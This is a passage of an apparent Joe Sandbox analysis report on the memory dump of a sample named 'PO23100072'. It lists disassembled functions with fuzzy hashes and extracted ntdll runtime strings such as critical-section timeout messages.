                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8eb2d77104a1e1af0b176298dacec9ef2cdf54e2e657e9d9900aaac880e5152b
                                                                • Instruction ID: 65921516359d62f8d5d3d0be205e1e26da0dc8636cbae108dd6a7fa2482c6dfb
                                                                • Opcode Fuzzy Hash: 8eb2d77104a1e1af0b176298dacec9ef2cdf54e2e657e9d9900aaac880e5152b
                                                                • Instruction Fuzzy Hash: 04900221246441525A45B25844045078006E7E1241795C026A2414970CC626DA6AD722
                                                                Function 017E2DB0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ea48599a799c62313db524f13018044e176bca0235e47b4c3979d6934356f8a2
                                                                • Instruction ID: 8444e8c5c073f08537f5feee0e5ad5f02bc349f8d6c074850bdbcaa0278670ac
                                                                • Opcode Fuzzy Hash: ea48599a799c62313db524f13018044e176bca0235e47b4c3979d6934356f8a2
                                                                • Instruction Fuzzy Hash: 5990023124540402D641725844046074009E7D1241F95C026A1424574EC755CB6AAB62
                                                                Function 017E2C60 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 74676fa8fa59c897a58c3357f5a7a2cee845890a9f2082f33bd2cd480c6430e1
                                                                • Instruction ID: 46c990dd8ed61010dd6670d268d27b14a518f24a921ec6edbfbf1a7cb9b8fd13
                                                                • Opcode Fuzzy Hash: 74676fa8fa59c897a58c3357f5a7a2cee845890a9f2082f33bd2cd480c6430e1
                                                                • Instruction Fuzzy Hash: 2490023120540842D60072584404B474005D7E1301F55C02AA1124674DC715CA657622
                                                                Function 017E2CF0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dadb452b7e5ec38fa9adad0733ab50bfe2fa8edc6d11c3e46a49b33a7ff986c1
                                                                • Instruction ID: 517ad7e89975005f97a2a8a5e667bc5ea15cb1d4b5e75f3dc0b28dd1704168f0
                                                                • Opcode Fuzzy Hash: dadb452b7e5ec38fa9adad0733ab50bfe2fa8edc6d11c3e46a49b33a7ff986c1
                                                                • Instruction Fuzzy Hash: 7D90023120540403D600725855087074005D7D1201F55D425A1424578DD756CA656222
                                                                Function 017E2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e5a4de0eed232571ca8cd1661b3c5d4e46d3ab1bc2e911a8a6b72b6cb8917b3d
                                                                • Instruction ID: 79336149b241350bb2d54b870bdcfdbd48e0d8f5ee45252b92eba27cbca614a1
                                                                • Opcode Fuzzy Hash: e5a4de0eed232571ca8cd1661b3c5d4e46d3ab1bc2e911a8a6b72b6cb8917b3d
                                                                • Instruction Fuzzy Hash: A690022160940402D640725854187074015D7D1201F55D025A1024574DC759CB6967A2
                                                                Function 017E2CA0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 52b71c9fb453d14b68e60cfe2279b946216de792947187a16aa424d6e4bad3e9
                                                                • Instruction ID: fd27892a745314af67f8a0688a96114a181443fe2dba9f9ab1fcdc923572a964
                                                                • Opcode Fuzzy Hash: 52b71c9fb453d14b68e60cfe2279b946216de792947187a16aa424d6e4bad3e9
                                                                • Instruction Fuzzy Hash: D590023120540402D600769854086474005D7E1301F55D025A6024575EC765CAA56232
                                                                Function 017E2F60 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9b72024da61fdfe1e398b3a837423e15873e725c18674b6fc1ab38c0e80a7351
                                                                • Instruction ID: 2841014abdc4105725c73c00277c66941673532dd50bf5416d59aef19869d387
                                                                • Opcode Fuzzy Hash: 9b72024da61fdfe1e398b3a837423e15873e725c18674b6fc1ab38c0e80a7351
                                                                • Instruction Fuzzy Hash: 7090026121540042D604725844047074045D7E2201F55C026A3154574CC629CE755226
                                                                Function 017E2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f8dcbc47ff78d25ac93dfaa5bc2c3405ae232fe74e054860ad89c2c471e4afcb
                                                                • Instruction ID: 6b7912cbe98c6291d18cdd3d23f79d03c31e2cce709b24ae8e4f3bd5564c3674
                                                                • Opcode Fuzzy Hash: f8dcbc47ff78d25ac93dfaa5bc2c3405ae232fe74e054860ad89c2c471e4afcb
                                                                • Instruction Fuzzy Hash: E690026134540442D60072584414B074005D7E2301F55C029E2064574DC719CE666227
                                                                Function 017E2FE0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bcdc14ce67e206b976cd3a333e1f5d7417efe98f786f219a6fd6ddae0baa91f7
                                                                • Instruction ID: 0fca94e7977060ebeb59763a7dc45cb4d812b3cb0d3e7c2aabcc05a946e0f4f6
                                                                • Opcode Fuzzy Hash: bcdc14ce67e206b976cd3a333e1f5d7417efe98f786f219a6fd6ddae0baa91f7
                                                                • Instruction Fuzzy Hash: 96900221215C0042D70076684C14B074005D7D1303F55C129A1154574CCA15CA755622
                                                                Function 017E2FB0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8e02c1efbca3e6233f75ca8c049f03407a70ef4f4983aee4a8da0e3d2c923b8f
                                                                • Instruction ID: 7ffa2d21d7ff0ce122559bda0b6cc416f7c2735e1bee329888a0144cf54fb9c7
                                                                • Opcode Fuzzy Hash: 8e02c1efbca3e6233f75ca8c049f03407a70ef4f4983aee4a8da0e3d2c923b8f
                                                                • Instruction Fuzzy Hash: B1900221605400424640726888449078005FBE2211755C135A1998570DC659CA795766
                                                                Function 017E2FA0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 32dbec27de7c3dbffeaa7d79dda39bfbbee8b8c3deee5488dd44b5af661039c0
                                                                • Instruction ID: e1f079f35e608d5ad94e785f17228664fbe32c919039a0edbb27b7bfd8048554
                                                                • Opcode Fuzzy Hash: 32dbec27de7c3dbffeaa7d79dda39bfbbee8b8c3deee5488dd44b5af661039c0
                                                                • Instruction Fuzzy Hash: E090023120580402D600725848087474005D7D1302F55C025A6164575EC765CAA56632
                                                                Function 017E2F90 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5592c2a0174579e0f1599abffda2e70a712e168f9b894b6d88469c03b290b3c7
                                                                • Instruction ID: d9febb8f12a19f75aa4bdab3256b3f537965d7c5311e4116f97cbde6e9e5cafe
                                                                • Opcode Fuzzy Hash: 5592c2a0174579e0f1599abffda2e70a712e168f9b894b6d88469c03b290b3c7
                                                                • Instruction Fuzzy Hash: B590023120580402D6007258481470B4005D7D1302F55C025A2164575DC725CA656672
                                                                Function 017E2E30 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fd87542325a73bc98ef1f935ff83e12a3d47b298c4193f5d401d7956e4729938
                                                                • Instruction ID: bd5b6988b98bdd7ebfd36082277141264e73849b87d19ccc65e5120ae462754f
                                                                • Opcode Fuzzy Hash: fd87542325a73bc98ef1f935ff83e12a3d47b298c4193f5d401d7956e4729938
                                                                • Instruction Fuzzy Hash: 3390022130540402D602725844146074009D7D2345F95C026E2424575DC725CB67A233
                                                                Function 017E2EE0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0812d4da02f8f4ba33ba60d39e49b090ff07e19fa305df49f96a73e505cbc0fd
                                                                • Instruction ID: d7e9c6c208ee8a8ed4764d7b09ae70e6b349872286f701461f9c6b919a6d5ba1
                                                                • Opcode Fuzzy Hash: 0812d4da02f8f4ba33ba60d39e49b090ff07e19fa305df49f96a73e505cbc0fd
                                                                • Instruction Fuzzy Hash: 9A90026120580403D640765848046074005D7D1302F55C025A3064575ECB29CE656236
                                                                Function 017E2EA0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 150b081a07d109a24e5c8f8146177299e89da804f8da015973acd4e96fc21942
                                                                • Instruction ID: 90dc857c85d3e8993448a6292bc9f7599339c03b67bac65335ab26f228d8309d
                                                                • Opcode Fuzzy Hash: 150b081a07d109a24e5c8f8146177299e89da804f8da015973acd4e96fc21942
                                                                • Instruction Fuzzy Hash: 8590027120540402D640725844047474005D7D1301F55C025A6064574EC759CFE96766
                                                                Function 017E2E80 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 849eb866d4fa0f6b2542454bb84b889035db637089e977abc9ef9213f38c9c64
                                                                • Instruction ID: a3b9a7e0a587a45723cb00d2949b40eb041668eb757a57189ee29a10781618eb
                                                                • Opcode Fuzzy Hash: 849eb866d4fa0f6b2542454bb84b889035db637089e977abc9ef9213f38c9c64
                                                                • Instruction Fuzzy Hash: 9D90022160540502D60172584404617400AD7D1241F95C036A2024575ECB25CBA6A232
                                                                Function 017E3010 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6a83df7388a7b01116b385189834ee49c11092cd057c833fee29882a0097905d
                                                                • Instruction ID: f59250e4770d0e19d23eb0730b09f07f85bd64a9afc2f77cae788fda0174fbc7
                                                                • Opcode Fuzzy Hash: 6a83df7388a7b01116b385189834ee49c11092cd057c833fee29882a0097905d
                                                                • Instruction Fuzzy Hash: 1F90022120584442D64073584804B0F8105D7E2202F95C02DA5156574CCA15CA695722
                                                                Function 017E3090 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0fe2a4d835767a3129c994f8ec61733e18ec3c9204feb17f48220ce04cb6cfb0
                                                                • Instruction ID: 7518df012147020bf278f6f953c188b8591faebdd23702be240d78f4fa555d09
                                                                • Opcode Fuzzy Hash: 0fe2a4d835767a3129c994f8ec61733e18ec3c9204feb17f48220ce04cb6cfb0
                                                                • Instruction Fuzzy Hash: 0A90022124540802D640725884147074006D7D1601F55C025A1024574DC716CB7967B2
                                                                Function 017E39B0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cb6158106bc7a328ebb850dd0e077bd0cb3388f728947a2c8c4eb962571edb2d
                                                                • Instruction ID: a7f7f84ff2c0b91613d8efa65152bd0e5e9b3798271f75486db265ff8d2cc528
                                                                • Opcode Fuzzy Hash: cb6158106bc7a328ebb850dd0e077bd0cb3388f728947a2c8c4eb962571edb2d
                                                                • Instruction Fuzzy Hash: 7390022124945102D650725C44046178005F7E1201F55C035A18145B4DC655CA696322
                                                                Function 017E3D70 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2c07d3119af45b96b464199886b454326c4184668c475cbecd94dbf3574492c4
                                                                • Instruction ID: 1bbaf283fb038aa6a6756da4a75377ec0c01c547d3630403fd55e450db913ee2
                                                                • Opcode Fuzzy Hash: 2c07d3119af45b96b464199886b454326c4184668c475cbecd94dbf3574492c4
                                                                • Instruction Fuzzy Hash: 8990023520540402DA10725858046474046D7D1301F55D425A1424578DC754CAB5A222
                                                                Function 017E3D10 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 51e53a5d949af346e6db96c2546ff1c88b801f8f83c00e0273468ba17733a7c6
                                                                • Instruction ID: 26cb14000f2b546b4e05629e6c39602eb1cb4363adbfc7d1b91cffa7072be0d0
                                                                • Opcode Fuzzy Hash: 51e53a5d949af346e6db96c2546ff1c88b801f8f83c00e0273468ba17733a7c6
                                                                • Instruction Fuzzy Hash: D8900231206401429A4073585804A4F8105D7E2302B95D429A1015574CCA14CA755322
                                                                Function 017E2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                • Instruction ID: 282b390c799939476a8114c964645d9b8899f5fb88ab7cbf9e26f997ec0e196a
                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                • Instruction Fuzzy Hash:
                                                                Function 017E2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: b9e2d83e92c4964600022c55fe7a69cd323d787078af57e8aaec0b4d3cc3b799
                                                                • Instruction ID: 183cafce112d5492bc2b5a0425753c34ccb7e2db340e70736b005c1f0bda4649
                                                                • Opcode Fuzzy Hash: b9e2d83e92c4964600022c55fe7a69cd323d787078af57e8aaec0b4d3cc3b799
                                                                • Instruction Fuzzy Hash: B051E3B6A04156AECB15DBACC89497EFBFCBB0C240B148269F569E7646D374DE00C7A0
                                                                Function 01852410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: 07fd6551abb1b23bdd703d42bb525ad9c2c93912454aa8d30b07c03c3ebf2885
                                                                • Instruction ID: a763c13f3b3fd35034b132962ff3374e776d745f69dc8f709e6041be80a6c6d0
                                                                • Opcode Fuzzy Hash: 07fd6551abb1b23bdd703d42bb525ad9c2c93912454aa8d30b07c03c3ebf2885
                                                                • Instruction Fuzzy Hash: DF510575A00645EECFA0DF6CC89087FFBFAEB44304B148469F996C7642DAB4EB448760
                                                                Function 017D7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Execute=1, xrefs: 01814713
                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018146FC
                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01814742
                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01814655
                                                                • ExecuteOptions, xrefs: 018146A0
                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01814787
                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01814725
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                • API String ID: 0-484625025
                                                                • Opcode ID: d9053459f726d969c1ecdd4d86f88cd5993695646784ec9b47f766d00cfd3129
                                                                • Instruction ID: 7b097f368ebb665cb93e43f7e2a5e02edfaeee40870442d8fb6aaa1af2cbc58e
                                                                • Opcode Fuzzy Hash: d9053459f726d969c1ecdd4d86f88cd5993695646784ec9b47f766d00cfd3129
                                                                • Instruction Fuzzy Hash: FE51397164021DBAEF15EBA8DC99FA9B7B8EF18318F1404D9D605E7181E7709B41CF50
                                                                Function 017EB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-$0$0
                                                                • API String ID: 1302938615-699404926
                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                • Instruction ID: 5270ccefbae1948bd2d263e772e859e8675d989e5a3d3594791f77230a13a856
                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                • Instruction Fuzzy Hash: 2A81D070E852498EEF298E6CC8997FEFFF1AF8D320F18415AD951A7691C7309840CB91
                                                                Function 018520E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$[$]:%u
                                                                • API String ID: 48624451-2819853543
                                                                • Opcode ID: 2a93d09bfea64d828be8f8f5ad3e06fae6dc4f61383c16ab4d17b8b138a193c6
                                                                • Instruction ID: 5f8c094f46e201fff233735c4c5095c2ec6402a8c7d989dc82a29ca6ffb1e091
                                                                • Opcode Fuzzy Hash: 2a93d09bfea64d828be8f8f5ad3e06fae6dc4f61383c16ab4d17b8b138a193c6
                                                                • Instruction Fuzzy Hash: 5421567AA00519ABDB50DE79DC449BFBBEAEF54744F040115ED05D3205EB30EA058B91
                                                                Function 017CF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018102BD
                                                                • RTL: Re-Waiting, xrefs: 0181031E
                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018102E7
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                • API String ID: 0-2474120054
                                                                • Opcode ID: 7e1f11bba32a0aa656bf8a0dd8bf5fc07c33896e38171119382948c2381d8f1a
                                                                • Instruction ID: e3e343046a924aa3b60de1bb6b10601b9353a372f1a57e35a2a5bc4bbf46d1a4
                                                                • Opcode Fuzzy Hash: 7e1f11bba32a0aa656bf8a0dd8bf5fc07c33896e38171119382948c2381d8f1a
                                                                • Instruction Fuzzy Hash: 42E1BE316047419FD726CF28C884B6AFBE5BB88B14F140A6DF5A5CB2E1D774DA84CB42
                                                                Function 017DBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RTL: Resource at %p, xrefs: 01817B8E
                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01817B7F
                                                                • RTL: Re-Waiting, xrefs: 01817BAC
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 0-871070163
                                                                • Opcode ID: ac6b8687aff72526df4f328deb582478113900551d9526e7ad79afc4b6190ef3
                                                                • Instruction ID: 0c44c4e4401baebd21901e1e060307798cb64001b3176ca05d04c2b1631c635e
                                                                • Opcode Fuzzy Hash: ac6b8687aff72526df4f328deb582478113900551d9526e7ad79afc4b6190ef3
                                                                • Instruction Fuzzy Hash: F541E3313047069FDB21DE29C840B6AF7F5EF9A720F100A6DFA5AD7280DB31E5458B91
                                                                Function 017DB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0181728C
                                                                Strings
                                                                • RTL: Resource at %p, xrefs: 018172A3
                                                                • RTL: Re-Waiting, xrefs: 018172C1
                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01817294
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 885266447-605551621
                                                                • Opcode ID: fbd12a72b931ab109e5a1d1667b28c6575924fc26cbf5c374424268c1c7c4811
